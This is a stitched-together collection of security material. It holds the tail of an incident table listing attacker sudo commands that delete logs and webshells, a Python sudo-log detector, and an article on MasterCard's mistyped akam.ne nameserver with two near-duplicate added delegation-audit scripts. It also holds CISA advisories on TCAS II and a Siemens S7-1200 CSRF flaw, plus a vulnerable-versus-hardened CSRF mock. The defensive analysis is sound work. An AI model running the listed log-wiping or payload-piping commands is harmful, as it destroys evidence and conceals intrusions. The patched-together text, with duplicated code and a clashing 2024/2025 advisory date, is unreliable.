Command: sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;rm /var/log/messages
Use: Removes evidence.

Command: sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;rm /opt/landesk/broker/webroot/gsb/site.cnf
Use: Removes site.cnf file (exfiltrated credentials).

Command: sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;rm /opt/landesk/broker/webroot/client/client.php
Use: Removes one of the original webshells.

Command: sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;rm /opt/landesk/broker/webroot/gsb/view.php
Use: Removes one of the original webshells.
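The sudo records in Table 14 are a rich detection source on their own: the invoking accounts are web-tier service accounts, the TTY is always unknown, and the commands cluster into a few recognizable behaviours (SELinux disabled, files written into the web root, touch -r timestomping, log removal). The script below is an added example of how a defender could parse /var/log/secure style sudo records and tag them against those behaviours; it is not part of the advisory and not Ivanti code. The sample records are constructed to mimic the table's layout with placeholder paths, account names and a placeholder base64 string.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Layout of a sudo record as shown in Table 14. An optional syslog prefix
# ("Jan  1 00:00:00 host sudo: ...") is tolerated so raw log lines also parse.
SUDO_RE = re.compile(
    r"(?:sudo:\s+|^)(?P<user>\S+) : (?:(?P<denied>user NOT in sudoers) ; )?"
    r"TTY=(?P<tty>\S+) ; PWD=(?P<pwd>\S+) ; USER=(?P<target>\S+) ; COMMAND=(?P<cmd>.*)$"
)
# Accounts that run the web tier; any sudo invocation by them is anomalous.
SERVICE_ACCOUNTS = {"nobody", "gsbadmin", "apache", "www-data"}
# Behaviour tags keyed on the COMMAND field, derived from the "Use" column above.
RULES = [
    (re.compile(r"setenforce\s+0"), "defense evasion: SELinux set to permissive"),
    (re.compile(r"\brm\s+(?:-\S+\s+)?/var/log/"), "defense evasion: log file removed"),
    (re.compile(r"\btouch\s+-r\b"), "defense evasion: timestomping with touch -r"),
    (re.compile(r"base64\s+-d\s*\|\s*(?:/usr/bin/|/bin/)?(?:bash|sh|python)"),
     "execution: base64-decoded payload piped to an interpreter"),
    (re.compile(r"\bsed\s+-i\b.*webroot\S*\.php"), "persistence: PHP file under the web root edited in place"),
    (re.compile(r">\s*\S*webroot\S*\.(?:php|cnf)"), "persistence or staging: file written into the web root"),
    (re.compile(r"\brm\s+\S*webroot\S*"), "anti-forensics: file under the web root removed"),
]


@dataclass
class SudoEvent:
    user: str
    target: str
    pwd: str
    command: str
    denied: bool
    tags: List[str] = field(default_factory=list)


def classify(line: str) -> Optional[SudoEvent]:
    """Parse one sudo record and attach behaviour tags; None if it is not a sudo record."""
    m = SUDO_RE.search(line)
    if not m:
        return None
    ev = SudoEvent(m["user"], m["target"], m["pwd"], m["cmd"].strip(), m["denied"] is not None)
    if ev.denied:
        ev.tags.append("privilege escalation attempt: sudo denied, user not in sudoers")
    if ev.user in SERVICE_ACCOUNTS:
        ev.tags.append(f"anomaly: service account {ev.user} invoking sudo")
    if m["tty"] == "unknown":
        ev.tags.append("anomaly: no controlling TTY (non-interactive caller)")
    for rx, tag in RULES:
        if rx.search(ev.command):
            ev.tags.append(tag)
    return ev


def triage_sudo(log_text: str) -> List[SudoEvent]:
    """All parsed sudo events, in order; untagged events are benign by these rules."""
    return [ev for ev in (classify(l) for l in log_text.splitlines()) if ev is not None]


# Constructed sample records mimicking Table 14; paths, accounts and the
# base64 placeholder are not advisory data.
SAMPLE_SUDO_LOG = "\n".join([
    "sudo: admin : TTY=pts/0 ; PWD=/home/admin ; USER=root ; COMMAND=/usr/bin/systemctl status httpd",
    "sudo:  nobody : user NOT in sudoers ; TTY=unknown ; PWD=/usr/bin ; USER=root ; COMMAND=/sbin/setenforce 0",
    "sudo: gsbadmin : TTY=unknown ; PWD=/opt/app/webroot ; USER=root ; "
    "COMMAND=/bin/sh -c echo PLACEHOLDER_B64== | base64 -d >/opt/app/webroot/view.php",
    "sudo: gsbadmin : TTY=unknown ; PWD=/opt/app/webroot ; USER=root ; "
    "COMMAND=/bin/sh -c cd /opt/app/webroot/;touch -r /opt/app/webroot/about.php /opt/app/webroot/index.php",
    "sudo: gsbadmin : TTY=unknown ; PWD=/opt/app/webroot ; USER=root ; "
    "COMMAND=/bin/sh -c cd /opt/app/webroot/;rm /var/log/messages",
])

if __name__ == "__main__":
    for ev in triage_sudo(SAMPLE_SUDO_LOG):
        status = "FLAGGED" if ev.tags else "ok"
        print(f"{status:8} {ev.user} -> {ev.target}: {ev.command}")
        for t in ev.tags:
            print("         -", t)
```

The account and TTY checks are the ones worth alerting on first: they do not depend on the attacker's command choice, whereas the command-pattern rules need updating whenever tooling changes.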


MasterCard DNS Error Went Unnoticed for Years

The payment card giant MasterCard just fixed a glaring error in its domain name server settings that could have allowed anyone to intercept or divert Internet traffic for the company by registering an unused domain name. The misconfiguration persisted for nearly five years until a security researcher spent $300 to register the domain and prevent it from being grabbed by cybercriminals.


A DNS lookup on the domain az.mastercard.com on Jan. 14, 2025 shows the mistyped domain name a22-65.akam.ne.

From June 30, 2020 until January 14, 2025, one of the core Internet servers that MasterCard uses to direct traffic for portions of the mastercard.com network was misnamed. MasterCard.com relies on five shared Domain Name System (DNS) servers at the Internet infrastructure provider Akamai [DNS acts as a kind of Internet phone book, by translating website names to numeric Internet addresses that are easier for computers to manage].

All of the Akamai DNS server names that MasterCard uses are supposed to end in “akam.net” but one of them was misconfigured to rely on the domain “akam.ne.”
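A one-character slip in a nameserver record is easy to miss by eye, but it is mechanical to check: every NS name in a delegation should fall under a registrable domain the organization expects (its own, or a known DNS provider's), and a near miss in edit distance is the signature of a typo. The following is an added example of such a check, not code from the article or from MasterCard or Akamai. It works on a list of NS hostnames you supply (for example from `dig NS` output) and runs offline; the sample list is constructed around the one name the article reports, a22-65.akam.ne, with the other four entries being placeholders.

```python
from dataclasses import dataclass
from typing import Iterable, List


def registrable_domain(hostname: str) -> str:
    """Last two labels of the name. Adequate for .com/.net style suffixes; a
    production check should consult the Public Suffix List, since names under
    second-level ccTLD suffixes (e.g. example.co.uk) would be split wrongly here."""
    labels = hostname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance; a typo such as a dropped letter scores 1."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


@dataclass
class NsProblem:
    nameserver: str        # the NS hostname as delegated
    registrable: str       # the domain someone would have to register to control it
    closest_expected: str  # the expected provider domain it most resembles
    distance: int          # edit distance to that expected domain


def check_delegation(nameservers: Iterable[str], expected_domains: Iterable[str]) -> List[NsProblem]:
    """Flag every NS whose registrable domain is not in the expected set."""
    expected = {d.lower().rstrip(".") for d in expected_domains}
    problems: List[NsProblem] = []
    for ns in nameservers:
        rd = registrable_domain(ns)
        if rd in expected:
            continue
        closest = min(expected, key=lambda e: edit_distance(rd, e))
        problems.append(NsProblem(ns, rd, closest, edit_distance(rd, closest)))
    return problems


# Constructed sample: a22-65.akam.ne is the name reported in the article; the
# other four are placeholders standing in for the provider's real NS names.
SAMPLE_NS = ["a1-67.akam.net", "a3-64.akam.net", "a9-66.akam.net", "a7-65.akam.net", "a22-65.akam.ne"]
EXPECTED_PROVIDERS = ["akam.net"]

if __name__ == "__main__":
    for p in check_delegation(SAMPLE_NS, EXPECTED_PROVIDERS):
        hint = " (likely typo of %s)" % p.closest_expected if p.distance <= 2 else ""
        print(f"NS {p.nameserver} is controlled by whoever registers {p.registrable}{hint}")
```

Running the same check periodically against the live delegation is what turns a five-year window into a same-day finding; the expected-provider list is the only input that needs maintaining.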

This tiny but potentially critical typo was discovered recently by Philippe Caturegli, founder of the security consultancy Seralys. Caturegli said he guessed that nobody had yet registered the domain akam.ne, which is under the purview of the top-level domain authority for the West Africa nation of Niger.

Caturegli said it took $300 and nearly three months of waiting to secure the domain with the registry in Niger. After enabling a DNS server on akam.ne, he noticed hundreds of thousands of DNS requests hitting his server each day from locations around the globe. Apparently, MasterCard wasn’t the only organization that had fat-fingered a DNS entry to include “akam.ne,” but they were by far the largest.

Had he enabled an email server on his new domain akam.ne, Caturegli likely would have received wayward emails directed toward mastercard.com or other affected domains. If he’d abused his access, he probably could have obtained website encryption certificates (SSL/TLS certs) that were authorized to accept and relay web traffic for affected websites. He may even have been able to passively receive Microsoft Windows authentication credentials from employee computers at affected companies.

But the researcher said he didn’t attempt to do any of that. Instead, he alerted MasterCard that the domain was theirs if they wanted it, copying this author on his notifications. A few hours later, MasterCard acknowledged the mistake, but said there was never any real threat to the security of its operations.

“We have looked into the matter and there was not a risk to our systems,” a MasterCard spokesperson wrote. “This typo has now been corrected.”

Meanwhile, Caturegli received a request submitted through Bugcrowd, a program that offers financial rewards and recognition to security researchers who find flaws and work privately with the affected vendor to fix them. The message suggested his public disclosure of the MasterCard DNS error via a post on LinkedIn (after he’d secured the akam.ne domain) was not aligned with ethical security practices, and passed on a request from MasterCard to have the post removed.

MasterCard’s request to Caturegli, a.k.a. “Titon” on infosec.exchange.

Caturegli said while he does have an account on Bugcrowd, he has never submitted anything through the Bugcrowd program, and that he reported this issue directly to MasterCard.

“I did not disclose this issue through Bugcrowd,” Caturegli wrote in reply. “Before making any public disclosure, I ensured that the affected domain was registered to prevent exploitation, mitigating any risk to MasterCard or its customers. This action, which we took at our own expense, demonstrates our commitment to ethical security practices and responsible disclosure.”

Most organizations have at least two authoritative domain name servers, but some handle so many DNS requests that they need to spread the load over additional DNS server domains. In MasterCard’s case, that number is five, so it stands to reason that if an attacker managed to seize control over just one of those domains they would only be able to see about one-fifth of the overall DNS requests coming in.

But Caturegli said the reality is that many Internet users are relying at least to some degree on public traffic forwarders or DNS resolvers like Cloudflare and Google.

“So all we need is for one of these resolvers to query our name server and cache the result,” Caturegli said. By publishing their DNS records with a long TTL or “Time To Live” — the value that tells resolvers how long they may keep a cached answer before asking again — an attacker’s poisoned answers for the target domain can be propagated by large cloud providers.

“With a long TTL, we may reroute a LOT more than just 1/5 of the traffic,” he said.
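The delegation check that would have caught this, as an added example that is not part of the article: given the nameserver names a zone delegates to, flag any whose registrable parent domain is not on the organisation's provider allowlist, and call out near-misses of an allowed provider separately, since a one-letter difference such as akam.ne for akam.net is almost always a typo pointing at a domain someone else can register. The allowlist and four of the five nameserver names below are constructed for the illustration; only a22-65.akam.ne comes from the article.

```python
"""Audit a zone's NS delegation for typo'd provider domains.

Added example, not code from the KrebsOnSecurity article. Input is a list of
nameserver hostnames as returned by an NS query for the zone; here the list is
constructed, with only a22-65.akam.ne taken from the article (the other four
Akamai-style names are made up for illustration).
"""
from typing import Iterable, List, Tuple

# Provider parent domains this organisation has actually contracted (assumed).
EXPECTED_PARENTS = {"akam.net", "akamaiedge.net"}

# Constructed NS record set for a zone that delegates to five Akamai servers,
# one of them carrying the typo the article describes.
SAMPLE_NS_RECORDS = [
    "a1-67.akam.net.",
    "a3-66.akam.net.",
    "a22-65.akam.ne.",   # from the article: '.ne' instead of '.net'
    "a7-64.akam.net.",
    "a18-67.akam.net.",
]


def registrable_parent(hostname: str) -> str:
    """Last two labels of a hostname ('a22-65.akam.ne.' -> 'akam.ne').
    Simplification: assumes a two-label registrable domain; a production
    tool would consult the Public Suffix List instead."""
    labels = hostname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def levenshtein(a: str, b: str) -> int:
    """Plain edit distance; used to spot one-character typos of a known provider."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def audit_nameservers(ns_records: Iterable[str], expected_parents=EXPECTED_PARENTS,
                      max_distance: int = 2) -> List[Tuple[str, str]]:
    """Return (nameserver, reason) for every NS whose parent domain is not on
    the allowlist. Near-misses of an allowed parent are reported separately:
    they are the cases where the registrable domain may belong to nobody yet."""
    findings = []
    for ns in ns_records:
        parent = registrable_parent(ns)
        if parent in expected_parents:
            continue
        closest = min(expected_parents, key=lambda p: levenshtein(parent, p))
        distance = levenshtein(parent, closest)
        if distance <= max_distance:
            findings.append((ns, f"likely typo of {closest} (edit distance {distance})"))
        else:
            findings.append((ns, "parent domain not on provider allowlist"))
    return findings


if __name__ == "__main__":
    for ns, reason in audit_nameservers(SAMPLE_NS_RECORDS):
        print(f"{ns}: {reason}")
```

In practice the input list comes from an NS query against each delegated zone (including subdomains such as az.mastercard.com, which may be delegated separately from the apex), and the audit is worth running on a schedule: the article's point is that the record sat unnoticed for almost five years, and a typo only has to be registered once.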

The researcher said he’d hoped that the credit card giant might thank him, or at least offer to cover the cost of buying the domain.

“We obviously disagree with this assessment,” Caturegli wrote in a follow-up post on LinkedIn regarding MasterCard’s public statement. “But we’ll let you judge— here are some of the DNS lookups we recorded before reporting the issue.”

Caturegli posted this screenshot of MasterCard domains that were potentially at risk from the misconfigured domain.

As the screenshot above shows, the misconfigured DNS server Caturegli found involved the MasterCard subdomain az.mastercard.com. It is not clear exactly how this subdomain is used by MasterCard; however, the naming conventions suggest the domains correspond to production servers at Microsoft’s Azure cloud service. Caturegli said the domains all resolve to Internet addresses at Microsoft.

“Don’t be like Mastercard,” Caturegli concluded in his LinkedIn post. “Don’t dismiss risk, and don’t let your marketing team handle security disclosures.”

One final note: The domain akam.ne has been registered previously — in December 2016 by someone using the email address um-i-delo@yandex.ru. The Russian search giant Yandex reports this user account belongs to an “Ivan I.” from Moscow. Passive DNS records from DomainTools.com show that between 2016 and 2018 the domain was connected to an Internet server in Germany, and that the domain was left to expire in 2018.

This is interesting given a comment on Caturegli’s LinkedIn post from an ex-Cloudflare employee who linked to a report he co-authored on a similar typo domain apparently registered in 2017 for organizations that may have mistyped their AWS DNS server as “awsdns-06.ne” instead of “awsdns-06.net.” DomainTools reports that this typo domain also was registered to a Yandex user (playlotto@yandex.ru), and was hosted at the same German ISP — Team Internet (AS61969).


Traffic Alert and Collision Avoidance System (TCAS) II

1. EXECUTIVE SUMMARY

CVSS v4 7.1
ATTENTION: Exploitable from adjacent network
Standard: Traffic Alert and Collision Avoidance System (TCAS) II
Equipment: Collision Avoidance Systems
Vulnerabilities: Reliance on Untrusted Inputs in a Security Decision, External Control of System or Configuration Setting

2. RISK EVALUATION
Successful exploitation of these vulnerabilities could allow an attacker to manipulate safety systems and cause a denial-of-service condition.
3. TECHNICAL DETAILS
3.1 AFFECTED PRODUCTS
The following revisions of TCAS II are affected:

TCAS II: Versions 7.1 and prior

3.2 Vulnerability Overview
3.2.1 Reliance on Untrusted Inputs in a Security Decision CWE-807
By utilizing software-defined radios and a custom low-latency processing pipeline, RF signals with spoofed location data can be transmitted to aircraft targets. This can lead to the appearance of fake aircraft on displays and potentially trigger undesired Resolution Advisories (RAs).
CVE-2024-9310 has been assigned to this vulnerability. A CVSS v3.1 base score of 6.1 has been calculated; the CVSS vector string is (AV:A/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N).
A CVSS v4 score has also been calculated for CVE-2024-9310. A base score of 6.0 has been calculated; the CVSS vector string is (AV:A/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N).
3.2.2 External Control of System or Configuration Setting CWE-15
For TCAS II systems using transponders compliant with MOPS earlier than RTCA DO-181F, an attacker can impersonate a ground station and issue a Comm-A Identity Request. This action can set the Sensitivity Level Control (SLC) to the lowest setting and disable the Resolution Advisory (RA), leading to a denial-of-service condition.
CVE-2024-11166 has been assigned to this vulnerability. A CVSS v3.1 base score of 8.2 has been calculated; the CVSS vector string is (AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:H).
A CVSS v4 score has also been calculated for CVE-2024-11166. A base score of 7.1 has been calculated; the CVSS vector string is (AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N).
3.3 BACKGROUND

CRITICAL INFRASTRUCTURE SECTORS: Transportation Systems
COUNTRIES/AREAS DEPLOYED: Worldwide
COMPANY HEADQUARTERS LOCATION: United States

3.4 RESEARCHER
Giacomo Longo and Enrico Russo of Genova University reported these vulnerabilities to CISA.
Martin Strohmeier and Vincent Lenders of armasuisse reported these vulnerabilities to CISA.
Alessio Merlo of Centre for High Defense Studies reported these vulnerabilities to CISA.
4. MITIGATIONS
After consulting with the Federal Aviation Administration (FAA) and the researchers regarding these vulnerabilities, it has been concluded that CVE-2024-11166 can be fully mitigated by upgrading to ACAS X or by upgrading the associated transponder to comply with RTCA DO-181F.
Currently, there is no mitigation available for CVE-2024-9310.
These vulnerabilities in the TCAS II standard are exploitable in a lab environment. However, they require very specific conditions to be met and are unlikely to be exploited outside of a lab setting.
Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.
No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time. These vulnerabilities are not exploitable remotely. These vulnerabilities have a high attack complexity.
5. UPDATE HISTORY

January 21, 2024: Initial Publication 


CISA Releases Three Industrial Control Systems Advisories

CISA released three Industrial Control Systems (ICS) advisories on January 21, 2025. These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS.

ICSA-25-021-01 Traffic Alert and Collision Avoidance System (TCAS) II
ICSA-25-021-02 Siemens SIMATIC S7-1200 CPUs
ICSA-25-021-03 ZF Roll Stability Support Plus (RSSPlus)

CISA encourages users and administrators to review newly released ICS advisories for technical details and mitigations. 


Siemens SIMATIC S7-1200 CPUs

As of January 10, 2023, CISA will no longer be updating ICS security advisories for Siemens product vulnerabilities beyond the initial advisory. For the most up-to-date information on vulnerabilities in this advisory, please see Siemens’ ProductCERT Security Advisories (CERT Services | Services | Siemens Global).
1. EXECUTIVE SUMMARY

CVSS v4 7.2
ATTENTION: Exploitable remotely/low attack complexity
Vendor: Siemens
Equipment: SIMATIC S7-1200 CPUs
Vulnerability: Cross-Site Request Forgery

2. RISK EVALUATION
Successful exploitation of this vulnerability could allow an unauthenticated attacker to change the CPU mode by tricking a legitimate and authenticated user with sufficient permissions on the target CPU to click on a malicious link.
3. TECHNICAL DETAILS
3.1 AFFECTED PRODUCTS
Siemens reports that the following products are affected:

SIMATIC S7-1200 CPU 1211C AC/DC/Rly (6ES7211-1BE40-0XB0): Versions prior to V4.7
SIMATIC S7-1200 CPU 1214C DC/DC/DC (6ES7214-1AG40-0XB0): Versions prior to V4.7
SIMATIC S7-1200 CPU 1214C DC/DC/Rly (6ES7214-1HG40-0XB0): Versions prior to V4.7
SIMATIC S7-1200 CPU 1214FC DC/DC/DC (6ES7214-1AF40-0XB0): Versions prior to V4.7
SIMATIC S7-1200 CPU 1214FC DC/DC/Rly (6ES7214-1HF40-0XB0): Versions prior to V4.7
SIMATIC S7-1200 CPU 1215C AC/DC/Rly (6ES7215-1BG40-0XB0): Versions prior to V4.7
SIMATIC S7-1200 CPU 1215C DC/DC/DC (6ES7215-1AG40-0XB0): Versions prior to V4.7
SIMATIC S7-1200 CPU 1215C DC/DC/Rly (6ES7215-1HG40-0XB0): Versions prior to V4.7
SIMATIC S7-1200 CPU 1215FC DC/DC/DC (6ES7215-1AF40-0XB0): Versions prior to V4.7
SIMATIC S7-1200 CPU 1215FC DC/DC/Rly (6ES7215-1HF40-0XB0): Versions prior to V4.7
SIMATIC S7-1200 CPU 1217C DC/DC/DC (6ES7217-1AG40-0XB0): Versions prior to V4.7
SIMATIC S7-1200 CPU 1211C DC/DC/DC (6ES7211-1AE40-0XB0): Versions prior to V4.7
SIPLUS S7-1200 CPU 1212 AC/DC/RLY (6AG1212-1BE40-2XB0): Versions prior to V4.7
SIPLUS S7-1200 CPU 1212 AC/DC/RLY (6AG1212-1BE40-4XB0): Versions prior to V4.7
SIPLUS S7-1200 CPU 1212 DC/DC/RLY (6AG1212-1HE40-2XB0): Versions prior to V4.7
SIPLUS S7-1200 CPU 1212 DC/DC/RLY (6AG1212-1HE40-4XB0): Versions prior to V4.7
SIPLUS S7-1200 CPU 1212C DC/DC/DC (6AG1212-1AE40-2XB0): Versions prior to V4.7
SIPLUS S7-1200 CPU 1212C DC/DC/DC (6AG1212-1AE40-4XB0): Versions prior to V4.7
SIPLUS S7-1200 CPU 1212C DC/DC/DC RAIL (6AG2212-1AE40-1XB0): Versions prior to V4.7
SIPLUS S7-1200 CPU 1214 AC/DC/RLY (6AG1214-1BG40-2XB0): Versions prior to V4.7
SIPLUS S7-1200 CPU 1214 AC/DC/RLY (6AG1214-1BG40-4XB0): Versions prior to V4.7
SIPLUS S7-1200 CPU 1214 AC/DC/RLY (6AG1214-1BG40-5XB0): Versions prior to V4.7
SIMATIC S7-1200 CPU 1211C DC/DC/Rly (6ES7211-1HE40-0XB0): Versions prior to V4.7
SIPLUS S7-1200 CPU 1214 DC/DC/DC (6AG1214-1AG40-2XB0): Versions prior to V4.7
SIPLUS S7-1200 CPU 1214 DC/DC/DC (6AG1214-1AG40-4XB0): Versions prior to V4.7
SIPLUS S7-1200 CPU 1214 DC/DC/DC (6AG1214-1AG40-5XB0): Versions prior to V4.7
SIPLUS S7-1200 CPU 1214 DC/DC/RLY (6AG1214-1HG40-2XB0): Versions prior to V4.7
SIPLUS S7-1200 CPU 1214 DC/DC/RLY (6AG1214-1HG40-4XB0): Versions prior to V4.7
SIPLUS S7-1200 CPU 1214 DC/DC/RLY (6AG1214-1HG40-5XB0): Versions prior to V4.7
SIPLUS S7-1200 CPU 1214C DC/DC/DC RAIL (6AG2214-1AG40-1XB0): Versions prior to V4.7
SIPLUS S7-1200 CPU 1214FC DC/DC/DC (6AG1214-1AF40-5XB0): Versions prior to V4.7
SIPLUS S7-1200 CPU 1214FC DC/DC/RLY (6AG1214-1HF40-5XB0): Versions prior to V4.7
SIPLUS S7-1200 CPU 1215 AC/DC/RLY (6AG1215-1BG40-2XB0): Versions prior to V4.7
SIMATIC S7-1200 CPU 1212C AC/DC/Rly (6ES7212-1BE40-0XB0): Versions prior to V4.7
SIPLUS S7-1200 CPU 1215 AC/DC/RLY (6AG1215-1BG40-4XB0): Versions prior to V4.7
SIPLUS S7-1200 CPU 1215 AC/DC/RLY (6AG1215-1BG40-5XB0): Versions prior to V4.7
SIPLUS S7-1200 CPU 1215 DC/DC/DC (6AG1215-1AG40-2XB0): Versions prior to V4.7
SIPLUS S7-1200 CPU 1215 DC/DC/DC (6AG1215-1AG40-4XB0): Versions prior to V4.7
SIPLUS S7-1200 CPU 1215 DC/DC/RLY (6AG1215-1HG40-2XB0): Versions prior to V4.7
SIPLUS S7-1200 CPU 1215 DC/DC/RLY (6AG1215-1HG40-4XB0): Versions prior to V4.7
SIPLUS S7-1200 CPU 1215 DC/DC/RLY (6AG1215-1HG40-5XB0): Versions prior to V4.7
SIPLUS S7-1200 CPU 1215C DC/DC/DC (6AG1215-1AG40-5XB0): Versions prior to V4.7
SIPLUS S7-1200 CPU 1215FC DC/DC/DC (6AG1215-1AF40-5XB0): Versions prior to V4.7
SIMATIC S7-1200 CPU 1212C DC/DC/DC (6ES7212-1AE40-0XB0): Versions prior to V4.7
SIMATIC S7-1200 CPU 1212C DC/DC/Rly (6ES7212-1HE40-0XB0): Versions prior to V4.7
SIMATIC S7-1200 CPU 1212FC DC/DC/DC (6ES7212-1AF40-0XB0): Versions prior to V4.7
SIMATIC S7-1200 CPU 1212FC DC/DC/Rly (6ES7212-1HF40-0XB0): Versions prior to V4.7
SIMATIC S7-1200 CPU 1214C AC/DC/Rly (6ES7214-1BG40-0XB0): Versions prior to V4.7

3.2 VULNERABILITY OVERVIEW
3.2.1 CROSS-SITE REQUEST FORGERY (CSRF) CWE-352
The web interface of the affected devices is vulnerable to cross-site request forgery (CSRF) attacks. This could allow an unauthenticated attacker to change the CPU mode by tricking a legitimate and authenticated user with sufficient permissions on the target CPU to click on a malicious link.
CVE-2024-47100 has been assigned to this vulnerability. A CVSS v3 base score of 7.1 has been assigned; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:H).
A CVSS v4 score has also been calculated for CVE-2024-47100. A base score of 7.2 has been calculated; the CVSS vector string is (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N).
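The CWE-352 pattern the advisory describes, with the standard defences beside it, as an added example: a generic mock of a controller's web interface, not Siemens' code, and it makes no claim about how the S7-1200 web server is built. The names Session, Request, Plc and SITE_ORIGIN are invented for the illustration. The vulnerable handler trusts the session cookie alone, so any link the logged-in engineer follows can change the mode; the hardened handler additionally requires POST, an Origin or Referer from the device's own UI, and a per-session anti-CSRF token.

```python
"""CSRF on a state-changing device endpoint: vulnerable handler beside a hardened one.

Added example: a generic mock of a controller web interface. It is not Siemens'
code and says nothing about how the S7-1200 web server is implemented. All names
here (Session, Request, Plc, SITE_ORIGIN) are invented for the illustration.
"""
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict, Optional, Set

SITE_ORIGIN = "https://plc.example.internal"  # assumed origin of the device UI


@dataclass
class Session:
    """Server-side session resolved from the browser's cookie."""
    user: str
    permissions: Set[str]
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(16))


@dataclass
class Request:
    method: str
    headers: Dict[str, str]
    params: Dict[str, str]          # query string or form body, already parsed
    session: Optional[Session]      # None when no valid session cookie was sent


class Plc:
    def __init__(self) -> None:
        self.mode = "RUN"


def change_mode_vulnerable(plc: Plc, req: Request) -> int:
    """Checks only that the cookie belongs to an authorised user. The browser
    attaches that cookie to every request to the device, so a link on a page
    the user is tricked into visiting is enough to flip the mode (CWE-352)."""
    if req.session is None or "change_mode" not in req.session.permissions:
        return 403
    plc.mode = req.params.get("mode", plc.mode)
    return 200


def change_mode_hardened(plc: Plc, req: Request) -> int:
    """Same authorisation plus three CSRF defences: state changes require POST,
    the Origin/Referer must be the device's own UI, and the request must carry
    the per-session anti-CSRF token (compared in constant time)."""
    if req.session is None or "change_mode" not in req.session.permissions:
        return 403
    if req.method != "POST":
        return 405
    origin = req.headers.get("Origin") or req.headers.get("Referer", "")
    if origin != SITE_ORIGIN and not origin.startswith(SITE_ORIGIN + "/"):
        return 403
    token = req.params.get("csrf_token", "")
    if not hmac.compare_digest(token, req.session.csrf_token):
        return 403
    plc.mode = req.params.get("mode", plc.mode)
    return 200


def forged_link_request(session: Session) -> Request:
    """What the server sees when the logged-in engineer follows a link on a
    third-party page: the session cookie is sent, the token is not."""
    return Request("GET", {"Referer": "https://third-party.example/"}, {"mode": "STOP"}, session)


def legitimate_request(session: Session) -> Request:
    """A form submitted from the device's own UI, carrying the session's token."""
    return Request("POST", {"Origin": SITE_ORIGIN},
                   {"mode": "STOP", "csrf_token": session.csrf_token}, session)


if __name__ == "__main__":
    engineer = Session("engineer", {"change_mode"})
    plc_a, plc_b = Plc(), Plc()
    print("vulnerable, forged link :", change_mode_vulnerable(plc_a, forged_link_request(engineer)), plc_a.mode)
    print("hardened, forged link   :", change_mode_hardened(plc_b, forged_link_request(engineer)), plc_b.mode)
    print("hardened, own UI form   :", change_mode_hardened(plc_b, legitimate_request(engineer)), plc_b.mode)
```

The defences are layered on purpose: the method check stops plain links, the origin check stops cross-site forms, and the token check survives even when a browser strips Referer. For the affected CPUs the fix is the firmware update to V4.7 named in the mitigations; the mock only shows what that class of fix has to achieve.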
3.3 BACKGROUND

CRITICAL INFRASTRUCTURE SECTORS: Critical Manufacturing
COUNTRIES/AREAS DEPLOYED: Worldwide
COMPANY HEADQUARTERS LOCATION: Germany

3.4 RESEARCHER
David Henrique Estevam de Andrade reported this vulnerability to Siemens.
4. MITIGATIONS
Siemens has released new versions for the affected products and recommends updating to the latest versions:

SIMATIC S7-1200 CPU: Update to V4.7 or later version.
SIPLUS S7-1200 CPU: Update to V4.7 or later version.

Siemens has identified the following specific workarounds and mitigations users can apply to reduce risk:

Do not click on links from untrusted sources.

As a general security measure, Siemens recommends protecting network access to devices with appropriate mechanisms. To operate the devices in a protected IT environment, Siemens recommends configuring the environment according to Siemens’ operational guidelines for industrial security and following recommendations in the product manuals.
Additional information on industrial security by Siemens can be found on the Siemens industrial security webpage.
For more information see the associated Siemens security advisory SSA-717113 in HTML and CSAF.
CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.
CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.
CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.
Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies.
Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.
CISA also recommends users take the following measures to protect themselves from social engineering attacks:

Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams.
Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.

No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time.
5. UPDATE HISTORY

January 21, 2025: Initial Publication 


ZF Roll Stability Support Plus (RSSPlus)

